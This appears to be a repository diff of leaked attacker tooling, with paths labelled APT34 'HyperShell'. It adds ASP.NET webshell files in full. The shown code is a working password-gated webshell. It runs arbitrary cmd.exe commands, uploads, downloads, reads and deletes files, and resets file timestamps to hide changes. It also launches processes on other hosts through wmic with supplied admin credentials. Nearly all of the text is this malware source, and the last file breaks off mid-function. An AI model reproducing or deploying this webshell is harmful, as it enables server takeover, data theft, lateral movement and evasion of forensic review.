long GetDirSize(System.IO.DirectoryInfo d){long size=0;try{System.IO.FileInfo[] fis=d.GetFiles();foreach(System.IO.FileInfo fi in fis){size+=fi.Length;}sizelvl++;System.IO.DirectoryInfo[] dis=d.GetDirectories();foreach(System.IO.DirectoryInfo di in dis){size+=GetDirSize(di);}}catch(UnauthorizedAccessException ex){sizeError="Error : "+ex.Message;hasErrorInGetSize=true;}return size;}
string createJsonDirectory(System.IO.DirectoryInfo[] dir){
string json="\"dir\":[";
for (int i=0;i<dir.Length;i++){
if (i>0)json+=",";
json +=string.Format("{{\"name\":\"{0}\",\"mdate\":\"{1}\"}}",dir[i].Name,dir[i].LastWriteTime.ToString("yyyy-MM-dd"));
}
json +="]";
return json;
}
string createJsonFile(System.IO.FileInfo[] file){
string json="\"file\":[";
for (int i=0;i<file.Length;i++){
if (i>0)json+=",";
json +=string.Format("{{\"name\":\"{0}\",\"size\":\"{1}\",\"mdate\":\"{2}\"}}",file[i].Name,sizeFix(file[i].Length),file[i].LastWriteTime.ToString("yyyy-MM-dd"));
}
json +="]";
return json;
}
string sizeFix(long size){double s=size;if(s<1024)return s+" B";s=s/1024;if(s<1024)return Math.Round(s,2)+" KB";s=s/1024;if(s<1024)return Math.Round(s,2)+" MB";s=s/1024;if(s<1024)return Math.Round(s,2)+" GB";s=s/1024;return Math.Round(s,2)+" TB";}
void response(string res){Response.Clear();Response.Write(tb(res));Response.Flush();Response.SuppressContent=true;ApplicationInstance.CompleteRequest();}
void changeTime(string timeh,string tfil,string ttar,string ttim){string ret="Error : -";try {if(!string.IsNullOrEmpty(tfil)){if(timeh=="1")ret=ti(tfil);else if(timeh=="2"){if(!string.IsNullOrEmpty(ttar)){System.IO.File.SetCreationTime(tfil,System.IO.File.GetCreationTime(ttar));System.IO.File.SetLastAccessTime(tfil,System.IO.File.GetLastAccessTime(ttar));System.IO.File.SetLastWriteTime(tfil,System.IO.File.GetLastWriteTime(ttar));ret="Time successfuly changed :<br>"+tfil+"<br>"+ti(tfil);}}else if(timeh=="3"){if(!string.IsNullOrEmpty(ttim)){DateTime te=DateTime.Parse(ttim);System.IO.File.SetCreationTime(tfil,te);System.IO.File.SetLastAccessTime(tfil,te);System.IO.File.SetLastWriteTime(tfil,te);ret="Time successfuly changed :<br>"+tfil+"<br>"+ti(tfil);}}}}catch(Exception e){ret="Error : "+e.Message;}response(ret);}
string ti(string tt){return "Creation Time :\t\t"+System.IO.File.GetCreationTime(tt).ToString("yyyy-MM-dd HH:mm:ss")+"<br>Last Access Time :\t"+System.IO.File.GetLastAccessTime(tt).ToString("yyyy-MM-dd HH:mm:ss")+"<br>Last Write Time :\t"+System.IO.File.GetLastWriteTime(tt).ToString("yyyy-MM-dd HH:mm:ss");}
</script>

288
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/ShellLocal-Special2/HighShellServerFixed.aspx Normal file
View File

@@ -0,0 +1,288 @@
<%@ Page Language="C#" ValidateRequest="false" EnableViewState="false" %>
<%
try
{
NameValueCollection t=HttpContext.Current.Request.Form;
method selectedMethod=method.auth;
try{int methodID=int.Parse(fb(t["m"]));selectedMethod=(method)methodID;}catch{rm();}
p=fb(t["p"]);
adminU=fb(t["adminU"]);
adminP=fb(t["adminP"]);
if(string.IsNullOrEmpty(p)){if(HttpContext.Current.Request.Cookies["p"] != null)p=fb(HttpContext.Current.Request.Cookies["p"].Value);}
if(selectedMethod != method.auth && selectedMethod != method.authAjax && !login(p)){rm();}
switch(selectedMethod){
case method.auth:
case method.authAjax:auth(p);break;
case method.command:
case method.commandAjax:command(fb(t["cmd"]));break;
case method.upload:upload(HttpContext.Current.Request.Files["uploadFile"],fb(t["uploadPath"]));break;
case method.download:download(fb(t["don"]),fb(t["isdel"]));break;
case method.downloadTest:downloadTest(fb(t["don"]));break;
case method.explorer:exp(fb(t["exadd"]));break;
case method.getsize:gsize(fb(t["gsize"]));break;
case method.getlocation:
case method.getlocationAjax:response(getLoc());break;
case method.rename:rename(fb(t["rename1"]),fb(t["rename2"]));break;
case method.copy:copy(fb(t["copy1"]),fb(t["copy2"]));break;
case method.view:view(fb(t["view"]));break;
case method.delete:delete(fb(t["delete"]));break;
case method.multiDelete:multiDelete(fb(t["delete"]));break;
case method.changeTime:changeTime(fb(t["timeh"]),fb(t["tfil"]),fb(t["ttar"]),fb(t["ttim"]));break;
default:break;
}
}
catch(Exception ex){response("Error : "+ex.Message);}
%>
<script runat="server">
enum method{auth=0,command=1,upload=2,uploadbase64=3,delete=4,download=5,changeTime=6,sqlQuery=7,explorer=8,getsize=9,getlocation=10,rename=11,copy=12,view=13,commandAjax=14,downloadTest=15,checkModules=16,installModule=17,uninstallModule=18,cmd7z=19,authAjax=20,getlocationAjax=21,multiDelete=24};
string salt="I9DRj5CH6Rtzd3HTCUbtJlmWNzsTa8b*2ldX3RT7ZOof(Zl$CaPQ3rpsGK74NMH1z";
string p,adminU,adminP;
bool aut=false;
string pp="TMzp5OlYv7Q0MSosaDqT5zRztTho/9/Ln7iayTV46VE=";
string a(string a,string b){return string.IsNullOrEmpty(a)?b:a;}
string tb(string a){string ret="";try{ret=string.IsNullOrEmpty(a)?a:Convert.ToBase64String(Encoding.UTF8.GetBytes(a));}catch{}return ret;}
string fb(string a){string ret="";try{ret=string.IsNullOrEmpty(a)?a:Encoding.UTF8.GetString(Convert.FromBase64String(a));}catch{}return ret;}
void rm(){Response.Redirect(Request.Url.AbsolutePath.Substring(0,Request.Url.AbsolutePath.LastIndexOf("/")+1)+" "+Request.Url.AbsolutePath.Substring(Request.Url.AbsolutePath.LastIndexOf("/")+1));}
void auth(string p){
string ret=string.Empty;
try {
ret = string.Format("{{\"auth\":\"{0}\",\"loc\":\"{1}\"}}", login(p).ToString(),tb(getLoc()));
} catch(Exception e){
ret ="Error : "+e.Message;
}
response(ret);
}
bool login(string p){bool aut=false;try{if(!string.IsNullOrEmpty(p)){aut=Convert.ToBase64String(new System.Security.Cryptography.SHA256CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(p+salt)))==pp;}}catch(Exception e){response(e.Message);}return aut;}
void command(string cmd){string ret="Error : -";try{string o=exec(cmd);o=o.Remove(0,o.IndexOf(Environment.NewLine)+2);o=o.Remove(0,o.IndexOf(Environment.NewLine)+2);o=o.Remove(0,o.IndexOf(Environment.NewLine));o=o.Remove(o.LastIndexOf(Environment.NewLine));o=o.Remove(o.LastIndexOf(Environment.NewLine)+2);ret=HttpUtility.HtmlEncode(o);}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
void upload(HttpPostedFile uploadFile,string uploadPath)
{
string ret="Error : -";
try {
if (System.IO.Path.IsPathRooted(uploadPath))
{
string FileName = System.IO.Path.GetFileName(uploadFile.FileName);
string FilePath = uploadPath.TrimEnd('\\') + "\\";
if (string.IsNullOrEmpty(System.IO.Path.GetExtension(uploadPath)))
{
if (!System.IO.Directory.Exists(uploadPath))
{
if (!string.IsNullOrEmpty(System.IO.Path.GetFileName(uploadPath)))
{
FileName = System.IO.Path.GetFileName(uploadPath);
FilePath = System.IO.Path.GetDirectoryName(uploadPath) + "\\";
}
}
}
else
{
FileName = System.IO.Path.GetFileName(uploadPath);
FilePath = System.IO.Path.GetDirectoryName(uploadPath) + "\\";
}
if (!System.IO.Directory.Exists(FilePath))
System.IO.Directory.CreateDirectory(FilePath);
uploadFile.SaveAs(FilePath + FileName);
ret ="File uploaded successfully : "+ FilePath + FileName;
}
else
ret="Error : The path is not current format \""+uploadPath+"\"";
} catch(Exception ex){
ret ="Error : "+ex.Message;
}
response(ret);
}
string getLoc(){return Server.MapPath(string.Empty)+"\\";}
void downloadTest(string don)
{
string ret = "Error : -";
try
{
if (!string.IsNullOrEmpty(don))
{
using (System.IO.Stream stream = new System.IO.FileStream(don, System.IO.FileMode.Open))
{
ret = string.Format("File '{0}' is ready for download", don);
}
}
}
catch (Exception e)
{
ret = "Error : " + e.Message;
}
response(ret);
}
void download(string don, string isdel)
{
string ret="Error : -";
try {
if (!string.IsNullOrEmpty(don)){
System.Web.HttpResponse response = System.Web.HttpContext.Current.Response;
response.ClearContent();
response.Clear();
response.ClearHeaders();
response.ContentType = "application/octet-stream";
response.AppendHeader("Content-Disposition", "attachment;size="+new System.IO.FileInfo(don).Length+";filename=" + HttpUtility.UrlEncode(tb(System.IO.Path.GetFileName(don))));
response.WriteFile(don);
response.Flush();
Response.SuppressContent = true;
ApplicationInstance.CompleteRequest();
}
}
catch(Exception e)
{
ret = "Error : " + e.Message;
response(ret);
}
}
string exec(string cmd){string pro="";System.Diagnostics.Process n=new System.Diagnostics.Process();n.StartInfo.FileName=(string.IsNullOrEmpty(pro)?"cmd.exe":pro);n.StartInfo.UseShellExecute=false;n.StartInfo.RedirectStandardInput=true;n.StartInfo.RedirectStandardOutput=true;n.StartInfo.RedirectStandardError=true;n.StartInfo.CreateNoWindow=true;string o=null;n.Start();n.StandardInput.WriteLine(cmd);n.StandardInput.WriteLine("exit");o=n.StandardOutput.ReadToEnd();n.WaitForExit();n.Close();return o;}
void gsize(string addr){string ret="Error : -";try{hasErrorInGetSize=false;long size=GetDirSize(new System.IO.DirectoryInfo(addr));ret=sizeFix(size);if(hasErrorInGetSize && sizelvl==0)ret=sizeError;else if(hasErrorInGetSize)ret="!"+ret;}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
void view(string path){string ret="You are viewing the contents of this file : "+path+Environment.NewLine;try{ret+=System.IO.File.ReadAllText(path);}catch(Exception ex){ret="Error : "+ex.Message;}response(HttpUtility.HtmlEncode(ret));}
void delete(string path){
string ret="Error : -";
try {
System.IO.File.Delete(path);
ret =string.Format("{{\"message\":\"{0}\",\"dirInfo\":\"{1}\"}}",tb(string.Format("File '{0}' successfuly deleted{1}",path,Environment.NewLine)),tb(getDirectoryInfo(System.IO.Path.GetDirectoryName(path))));
} catch(Exception ex){
ret ="Error : "+ex.Message;
}
response(ret);
}
void multiDelete(string files)
{
string ret="Error : -";
try{
string[] f = files.Split('|');
ret = string.Format("All '{0}' files successfuly deleted.", f.Length);
foreach (string item in f)
{
System.IO.File.Delete(fb(item));
}
}catch (Exception ex){
ret ="Error : "+ex.Message;
}
response(ret);
}
void rename(string oldName,string newName){string ret="Error : -";try{if(newName.EndsWith("\\"))newName+=System.IO.Path.GetFileName(oldName);System.IO.File.Move(oldName,newName);ret=string.Format("{{\"message\":\"{0}\",\"dirInfo\":\"{1}\"}}",tb(string.Format("File '{0}' successfuly moved to '{1}'{2}",oldName,newName,Environment.NewLine)),tb(getDirectoryInfo(System.IO.Path.GetDirectoryName(oldName))));}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
void copy(string oldName,string newName){string ret="Error : -";try{if(newName.EndsWith("\\"))newName+=System.IO.Path.GetFileName(oldName);System.IO.File.Copy(oldName,newName);ret=string.Format("{{\"message\":\"{0}\",\"dirInfo\":\"{1}\"}}",tb(string.Format("File '{0}' successfuly copied to '{1}'{2}",oldName,newName,Environment.NewLine)),tb(getDirectoryInfo(System.IO.Path.GetDirectoryName(oldName))));}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
string getDirectoryInfo(string address)
{
string ret="Error : -";
try {
if (address.ToLower()=="root"){
ret ="{\"dir\":[{\"name\":\"\\\\\\\\localhost\"}";
string netUse=exec("net use");
string[] lines=netUse.Split(new string[]{Environment.NewLine },StringSplitOptions.RemoveEmptyEntries);
foreach (string item in lines){
if (item.ToLower().StartsWith("ok")){
int index=item.IndexOf("\\\\");
ret +=",{\"name\":\"\\\\"+item.Substring(index,item.IndexOf('\\',index+2)-index)+"\"}";
}
}
ret +="]}";
} else{
if (address.StartsWith("\\\\")&& address.Trim('\\').Split('\\').Length==1){
string tmp=address.ToLower().TrimEnd('\\');
if (tmp=="\\\\localhost"){
ret ="{\"dir\":[";
bool isStart=false;
foreach (System.IO.DriveInfo item in System.IO.DriveInfo.GetDrives()){
if (item.IsReady){
if (isStart)
ret +=",";
ret +=string.Format("{{\"name\":\"{0}\",\"totalSize\":\"{1}\",\"freeSpace\":\"{2}\",\"sizeText\":\"{3}\",\"format\":\"{4}\",\"type\":\"{5}\"}}",item.Name.TrimEnd('\\').TrimEnd(':')+"$",item.TotalSize,item.TotalFreeSpace,"["+sizeFix(item.TotalFreeSpace)+"] free of ["+sizeFix(item.TotalSize)+"]",item.DriveFormat,item.DriveType);
isStart =true;
}
}
ret +="]}";
} else{
if (!string.IsNullOrEmpty(adminU)&& !string.IsNullOrEmpty(adminP)){
string strWC=@"wmic /node:{0} /user:{1} /password:{2} process call create ""cmd.exe /c > c:\windows\temp\KMSHFX0023{3}.tmp 2>&1 wmic logicaldisk get {4}"" 2>&1";
string strWF=@"\\{0}\c$\windows\temp\KMSHFX0023{1}.tmp";
string strWD=@"del {0} 2>&1";
tmp =tmp.TrimStart('\\');
exec(string.Format(strWC,tmp,adminU,adminP,1,"Caption"));
exec(string.Format(strWC,tmp,adminU,adminP,2,"FileSystem"));
exec(string.Format(strWC,tmp,adminU,adminP,3,"Size"));
exec(string.Format(strWC,tmp,adminU,adminP,4,"FreeSpace"));
exec(string.Format(strWC,tmp,adminU,adminP,5,"Description"));
System.Threading.Thread.Sleep(3000);
string[] diskTemp = new string[100];
for (int i = 1; i <= 5; i++)
{
string f = string.Format(strWF, tmp, i);
string[] lDisk = System.IO.File.ReadAllLines(f);
exec(string.Format(strWD, f));
for (int j = 1; j < lDisk.Length; j++)
{
if (i == 1) diskTemp[j - 1] = lDisk[j];
else diskTemp[j - 1] += "|" + lDisk[j];
}
}
ret = "{\"dir\":[";
bool isStart = false;
foreach (string item in diskTemp)
{
if (!string.IsNullOrEmpty(item))
{
string[] diskInfo = item.Split('|');
long TotalSize = 0;
long TotalFreeSpace = 0;
long.TryParse(diskInfo[2], out TotalSize);
long.TryParse(diskInfo[3], out TotalFreeSpace);
if (isStart)
ret += ",";
ret += string.Format("{{\"name\":\"{0}\",\"totalSize\":\"{1}\",\"freeSpace\":\"{2}\",\"sizeText\":\"{3}\",\"format\":\"{4}\",\"type\":\"{5}\"}}", diskInfo[0].TrimEnd('\\').TrimEnd(' ').TrimEnd(':') + "$", TotalSize, TotalFreeSpace, "[" + sizeFix(TotalFreeSpace) + "] free of [" + sizeFix(TotalSize) + "]", diskInfo[1], diskInfo[4]);
isStart = true;
}
}
ret += "]}";
} else
ret ="Error : Admin Username or Password is empty";
}
} else{
System.IO.FileAttributes attr=System.IO.File.GetAttributes(address);
if ((attr & System.IO.FileAttributes.Directory)==System.IO.FileAttributes.Directory){
System.IO.DirectoryInfo dirInfo=new System.IO.DirectoryInfo(address);
ret ="{"+string.Format("{0},{1}",createJsonDirectory(dirInfo.GetDirectories()),createJsonFile(dirInfo.GetFiles()))+"}";
}
}
}
} catch(Exception ex){
ret ="Error : "+ex.Message;
}
return ret;
}
void exp(string exadd){string ret="Error : -";ret=getDirectoryInfo(exadd);response(ret);}
bool hasErrorInGetSize=false;
int sizelvl=0;
string sizeError;
long GetDirSize(System.IO.DirectoryInfo d){long size=0;try{System.IO.FileInfo[] fis=d.GetFiles();foreach(System.IO.FileInfo fi in fis){size+=fi.Length;}sizelvl++;System.IO.DirectoryInfo[] dis=d.GetDirectories();foreach(System.IO.DirectoryInfo di in dis){size+=GetDirSize(di);}}catch(UnauthorizedAccessException ex){sizeError="Error : "+ex.Message;hasErrorInGetSize=true;}return size;}
string createJsonDirectory(System.IO.DirectoryInfo[] dir){
string json="\"dir\":[";
for (int i=0;i<dir.Length;i++){
if (i>0)json+=",";
json +=string.Format("{{\"name\":\"{0}\",\"mdate\":\"{1}\"}}",dir[i].Name,dir[i].LastWriteTime.ToString("yyyy-MM-dd"));
}
json +="]";
return json;
}
string createJsonFile(System.IO.FileInfo[] file){
string json="\"file\":[";
for (int i=0;i<file.Length;i++){
if (i>0)json+=",";
json +=string.Format("{{\"name\":\"{0}\",\"size\":\"{1}\",\"mdate\":\"{2}\"}}",file[i].Name,sizeFix(file[i].Length),file[i].LastWriteTime.ToString("yyyy-MM-dd"));
}
json +="]";
return json;
}
string sizeFix(long size){double s=size;if(s<1024)return s+" B";s=s/1024;if(s<1024)return Math.Round(s,2)+" KB";s=s/1024;if(s<1024)return Math.Round(s,2)+" MB";s=s/1024;if(s<1024)return Math.Round(s,2)+" GB";s=s/1024;return Math.Round(s,2)+" TB";}
void response(string res){Response.Clear();Response.Write(tb(res));Response.Flush();Response.SuppressContent=true;ApplicationInstance.CompleteRequest();}
void changeTime(string timeh,string tfil,string ttar,string ttim){string ret="Error : -";try {if(!string.IsNullOrEmpty(tfil)){if(timeh=="1")ret=ti(tfil);else if(timeh=="2"){if(!string.IsNullOrEmpty(ttar)){System.IO.File.SetCreationTime(tfil,System.IO.File.GetCreationTime(ttar));System.IO.File.SetLastAccessTime(tfil,System.IO.File.GetLastAccessTime(ttar));System.IO.File.SetLastWriteTime(tfil,System.IO.File.GetLastWriteTime(ttar));ret="Time successfuly changed :<br>"+tfil+"<br>"+ti(tfil);}}else if(timeh=="3"){if(!string.IsNullOrEmpty(ttim)){DateTime te=DateTime.Parse(ttim);System.IO.File.SetCreationTime(tfil,te);System.IO.File.SetLastAccessTime(tfil,te);System.IO.File.SetLastWriteTime(tfil,te);ret="Time successfuly changed :<br>"+tfil+"<br>"+ti(tfil);}}}}catch(Exception e){ret="Error : "+e.Message;}response(ret);}
string ti(string tt){return "Creation Time :\t\t"+System.IO.File.GetCreationTime(tt).ToString("yyyy-MM-dd HH:mm:ss")+"<br>Last Access Time :\t"+System.IO.File.GetLastAccessTime(tt).ToString("yyyy-MM-dd HH:mm:ss")+"<br>Last Write Time :\t"+System.IO.File.GetLastWriteTime(tt).ToString("yyyy-MM-dd HH:mm:ss");}
</script>

1255
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/ShellLocal-Special3/HighShellLocal.aspx Normal file
View File

File diff suppressed because it is too large Load Diff

288
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/ShellLocal-Special3/HighShellServer.aspx Normal file
View File

@@ -0,0 +1,288 @@
<%@ Page Language="C#" ValidateRequest="false" EnableViewState="false" %>
<%
try
{
NameValueCollection t=HttpContext.Current.Request.Form;
method selectedMethod=method.auth;
try{int methodID=int.Parse(fb(t["m"]));selectedMethod=(method)methodID;}catch{rm();}
p=fb(t["p"]);
adminU=fb(t["adminU"]);
adminP=fb(t["adminP"]);
if(string.IsNullOrEmpty(p)){if(HttpContext.Current.Request.Cookies["p"] != null)p=fb(HttpContext.Current.Request.Cookies["p"].Value);}
if(selectedMethod != method.auth && selectedMethod != method.authAjax && !login(p)){rm();}
switch(selectedMethod){
case method.auth:
case method.authAjax:auth(p);break;
case method.command:
case method.commandAjax:command(fb(t["cmd"]));break;
case method.upload:upload(HttpContext.Current.Request.Files["uploadFile"],fb(t["uploadPath"]));break;
case method.download:download(fb(t["don"]),fb(t["isdel"]));break;
case method.downloadTest:downloadTest(fb(t["don"]));break;
case method.explorer:exp(fb(t["exadd"]));break;
case method.getsize:gsize(fb(t["gsize"]));break;
case method.getlocation:
case method.getlocationAjax:response(getLoc());break;
case method.rename:rename(fb(t["rename1"]),fb(t["rename2"]));break;
case method.copy:copy(fb(t["copy1"]),fb(t["copy2"]));break;
case method.view:view(fb(t["view"]));break;
case method.delete:delete(fb(t["delete"]));break;
case method.multiDelete:multiDelete(fb(t["delete"]));break;
case method.changeTime:changeTime(fb(t["timeh"]),fb(t["tfil"]),fb(t["ttar"]),fb(t["ttim"]));break;
default:break;
}
}
catch(Exception ex){response("Error : "+ex.Message);}
%>
<script runat="server">
enum method{auth=0,command=1,upload=2,uploadbase64=3,delete=4,download=5,changeTime=6,sqlQuery=7,explorer=8,getsize=9,getlocation=10,rename=11,copy=12,view=13,commandAjax=14,downloadTest=15,checkModules=16,installModule=17,uninstallModule=18,cmd7z=19,authAjax=20,getlocationAjax=21,multiDelete=24};
string salt="zpT27yKM#a6xQ2#Yj4JB6VS3Qcl8U^*zMVR3MuVuVjWTgI1LeM4mFyHHAT^OnF#*";
string p,adminU,adminP;
bool aut=false;
string pp="+Zgi2BaVbaVAFH6LqpHFtrjfMxPgYpLbt6RmxkDda6k=";
string a(string a,string b){return string.IsNullOrEmpty(a)?b:a;}
string tb(string a){string ret="";try{ret=string.IsNullOrEmpty(a)?a:Convert.ToBase64String(Encoding.UTF8.GetBytes(a));}catch{}return ret;}
string fb(string a){string ret="";try{ret=string.IsNullOrEmpty(a)?a:Encoding.UTF8.GetString(Convert.FromBase64String(a));}catch{}return ret;}
void rm(){Response.Redirect(Request.Url.AbsolutePath.Substring(0,Request.Url.AbsolutePath.LastIndexOf("/")+1)+" "+Request.Url.AbsolutePath.Substring(Request.Url.AbsolutePath.LastIndexOf("/")+1));}
void auth(string p){
string ret=string.Empty;
try {
ret = string.Format("{{\"auth\":\"{0}\",\"loc\":\"{1}\"}}", login(p).ToString(),tb(getLoc()));
} catch(Exception e){
ret ="Error : "+e.Message;
}
response(ret);
}
bool login(string p){bool aut=false;try{if(!string.IsNullOrEmpty(p)){aut=Convert.ToBase64String(new System.Security.Cryptography.SHA256CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(p+salt)))==pp;}}catch(Exception e){response(e.Message);}return aut;}
void command(string cmd){string ret="Error : -";try{string o=exec(cmd);o=o.Remove(0,o.IndexOf(Environment.NewLine)+2);o=o.Remove(0,o.IndexOf(Environment.NewLine)+2);o=o.Remove(0,o.IndexOf(Environment.NewLine));o=o.Remove(o.LastIndexOf(Environment.NewLine));o=o.Remove(o.LastIndexOf(Environment.NewLine)+2);ret=HttpUtility.HtmlEncode(o);}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
void upload(HttpPostedFile uploadFile,string uploadPath)
{
string ret="Error : -";
try {
if (System.IO.Path.IsPathRooted(uploadPath))
{
string FileName = System.IO.Path.GetFileName(uploadFile.FileName);
string FilePath = uploadPath.TrimEnd('\\') + "\\";
if (string.IsNullOrEmpty(System.IO.Path.GetExtension(uploadPath)))
{
if (!System.IO.Directory.Exists(uploadPath))
{
if (!string.IsNullOrEmpty(System.IO.Path.GetFileName(uploadPath)))
{
FileName = System.IO.Path.GetFileName(uploadPath);
FilePath = System.IO.Path.GetDirectoryName(uploadPath) + "\\";
}
}
}
else
{
FileName = System.IO.Path.GetFileName(uploadPath);
FilePath = System.IO.Path.GetDirectoryName(uploadPath) + "\\";
}
if (!System.IO.Directory.Exists(FilePath))
System.IO.Directory.CreateDirectory(FilePath);
uploadFile.SaveAs(FilePath + FileName);
ret ="File uploaded successfully : "+ FilePath + FileName;
}
else
ret="Error : The path is not current format \""+uploadPath+"\"";
} catch(Exception ex){
ret ="Error : "+ex.Message;
}
response(ret);
}
string getLoc(){return Server.MapPath(string.Empty)+"\\";}
void downloadTest(string don)
{
string ret = "Error : -";
try
{
if (!string.IsNullOrEmpty(don))
{
using (System.IO.Stream stream = new System.IO.FileStream(don, System.IO.FileMode.Open))
{
ret = string.Format("File '{0}' is ready for download", don);
}
}
}
catch (Exception e)
{
ret = "Error : " + e.Message;
}
response(ret);
}
void download(string don, string isdel)
{
string ret="Error : -";
try {
if (!string.IsNullOrEmpty(don)){
System.Web.HttpResponse response = System.Web.HttpContext.Current.Response;
response.ClearContent();
response.Clear();
response.ClearHeaders();
response.ContentType = "application/octet-stream";
response.AppendHeader("Content-Disposition", "attachment;size="+new System.IO.FileInfo(don).Length+";filename=" + HttpUtility.UrlEncode(tb(System.IO.Path.GetFileName(don))));
response.WriteFile(don);
response.Flush();
Response.SuppressContent = true;
ApplicationInstance.CompleteRequest();
}
}
catch(Exception e)
{
ret = "Error : " + e.Message;
response(ret);
}
}
string exec(string cmd){string pro="";System.Diagnostics.Process n=new System.Diagnostics.Process();n.StartInfo.FileName=(string.IsNullOrEmpty(pro)?"cmd.exe":pro);n.StartInfo.UseShellExecute=false;n.StartInfo.RedirectStandardInput=true;n.StartInfo.RedirectStandardOutput=true;n.StartInfo.RedirectStandardError=true;n.StartInfo.CreateNoWindow=true;string o=null;n.Start();n.StandardInput.WriteLine(cmd);n.StandardInput.WriteLine("exit");o=n.StandardOutput.ReadToEnd();n.WaitForExit();n.Close();return o;}
void gsize(string addr){string ret="Error : -";try{hasErrorInGetSize=false;long size=GetDirSize(new System.IO.DirectoryInfo(addr));ret=sizeFix(size);if(hasErrorInGetSize && sizelvl==0)ret=sizeError;else if(hasErrorInGetSize)ret="!"+ret;}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
void view(string path){string ret="You are viewing the contents of this file : "+path+Environment.NewLine;try{ret+=System.IO.File.ReadAllText(path);}catch(Exception ex){ret="Error : "+ex.Message;}response(HttpUtility.HtmlEncode(ret));}
void delete(string path){
string ret="Error : -";
try {
System.IO.File.Delete(path);
ret =string.Format("{{\"message\":\"{0}\",\"dirInfo\":\"{1}\"}}",tb(string.Format("File '{0}' successfuly deleted{1}",path,Environment.NewLine)),tb(getDirectoryInfo(System.IO.Path.GetDirectoryName(path))));
} catch(Exception ex){
ret ="Error : "+ex.Message;
}
response(ret);
}
void multiDelete(string files)
{
string ret="Error : -";
try{
string[] f = files.Split('|');
ret = string.Format("All '{0}' files successfuly deleted.", f.Length);
foreach (string item in f)
{
System.IO.File.Delete(fb(item));
}
}catch (Exception ex){
ret ="Error : "+ex.Message;
}
response(ret);
}
void rename(string oldName,string newName){string ret="Error : -";try{if(newName.EndsWith("\\"))newName+=System.IO.Path.GetFileName(oldName);System.IO.File.Move(oldName,newName);ret=string.Format("{{\"message\":\"{0}\",\"dirInfo\":\"{1}\"}}",tb(string.Format("File '{0}' successfuly moved to '{1}'{2}",oldName,newName,Environment.NewLine)),tb(getDirectoryInfo(System.IO.Path.GetDirectoryName(oldName))));}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
void copy(string oldName,string newName){string ret="Error : -";try{if(newName.EndsWith("\\"))newName+=System.IO.Path.GetFileName(oldName);System.IO.File.Copy(oldName,newName);ret=string.Format("{{\"message\":\"{0}\",\"dirInfo\":\"{1}\"}}",tb(string.Format("File '{0}' successfuly copied to '{1}'{2}",oldName,newName,Environment.NewLine)),tb(getDirectoryInfo(System.IO.Path.GetDirectoryName(oldName))));}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
string getDirectoryInfo(string address)
{
string ret="Error : -";
try {
if (address.ToLower()=="root"){
ret ="{\"dir\":[{\"name\":\"\\\\\\\\localhost\"}";
string netUse=exec("net use");
string[] lines=netUse.Split(new string[]{Environment.NewLine },StringSplitOptions.RemoveEmptyEntries);
foreach (string item in lines){
if (item.ToLower().StartsWith("ok")){
int index=item.IndexOf("\\\\");
ret +=",{\"name\":\"\\\\"+item.Substring(index,item.IndexOf('\\',index+2)-index)+"\"}";
}
}
ret +="]}";
} else{
if (address.StartsWith("\\\\")&& address.Trim('\\').Split('\\').Length==1){
string tmp=address.ToLower().TrimEnd('\\');
if (tmp=="\\\\localhost"){
ret ="{\"dir\":[";
bool isStart=false;
foreach (System.IO.DriveInfo item in System.IO.DriveInfo.GetDrives()){
if (item.IsReady){
if (isStart)
ret +=",";
ret +=string.Format("{{\"name\":\"{0}\",\"totalSize\":\"{1}\",\"freeSpace\":\"{2}\",\"sizeText\":\"{3}\",\"format\":\"{4}\",\"type\":\"{5}\"}}",item.Name.TrimEnd('\\').TrimEnd(':')+"$",item.TotalSize,item.TotalFreeSpace,"["+sizeFix(item.TotalFreeSpace)+"] free of ["+sizeFix(item.TotalSize)+"]",item.DriveFormat,item.DriveType);
isStart =true;
}
}
ret +="]}";
} else{
if (!string.IsNullOrEmpty(adminU)&& !string.IsNullOrEmpty(adminP)){
string strWC=@"wmic /node:{0} /user:{1} /password:{2} process call create ""cmd.exe /c > c:\windows\temp\KMSHFX0023{3}.tmp 2>&1 wmic logicaldisk get {4}"" 2>&1";
string strWF=@"\\{0}\c$\windows\temp\KMSHFX0023{1}.tmp";
string strWD=@"del {0} 2>&1";
tmp =tmp.TrimStart('\\');
exec(string.Format(strWC,tmp,adminU,adminP,1,"Caption"));
exec(string.Format(strWC,tmp,adminU,adminP,2,"FileSystem"));
exec(string.Format(strWC,tmp,adminU,adminP,3,"Size"));
exec(string.Format(strWC,tmp,adminU,adminP,4,"FreeSpace"));
exec(string.Format(strWC,tmp,adminU,adminP,5,"Description"));
System.Threading.Thread.Sleep(3000);
string[] diskTemp = new string[100];
for (int i = 1; i <= 5; i++)
{
string f = string.Format(strWF, tmp, i);
string[] lDisk = System.IO.File.ReadAllLines(f);
exec(string.Format(strWD, f));
for (int j = 1; j < lDisk.Length; j++)
{
if (i == 1) diskTemp[j - 1] = lDisk[j];
else diskTemp[j - 1] += "|" + lDisk[j];
}
}
ret = "{\"dir\":[";
bool isStart = false;
foreach (string item in diskTemp)
{
if (!string.IsNullOrEmpty(item))
{
string[] diskInfo = item.Split('|');
long TotalSize = 0;
long TotalFreeSpace = 0;
long.TryParse(diskInfo[2], out TotalSize);
long.TryParse(diskInfo[3], out TotalFreeSpace);
if (isStart)
ret += ",";
ret += string.Format("{{\"name\":\"{0}\",\"totalSize\":\"{1}\",\"freeSpace\":\"{2}\",\"sizeText\":\"{3}\",\"format\":\"{4}\",\"type\":\"{5}\"}}", diskInfo[0].TrimEnd('\\').TrimEnd(' ').TrimEnd(':') + "$", TotalSize, TotalFreeSpace, "[" + sizeFix(TotalFreeSpace) + "] free of [" + sizeFix(TotalSize) + "]", diskInfo[1], diskInfo[4]);
isStart = true;
}
}
ret += "]}";
} else
ret ="Error : Admin Username or Password is empty";
}
} else{
System.IO.FileAttributes attr=System.IO.File.GetAttributes(address);
if ((attr & System.IO.FileAttributes.Directory)==System.IO.FileAttributes.Directory){
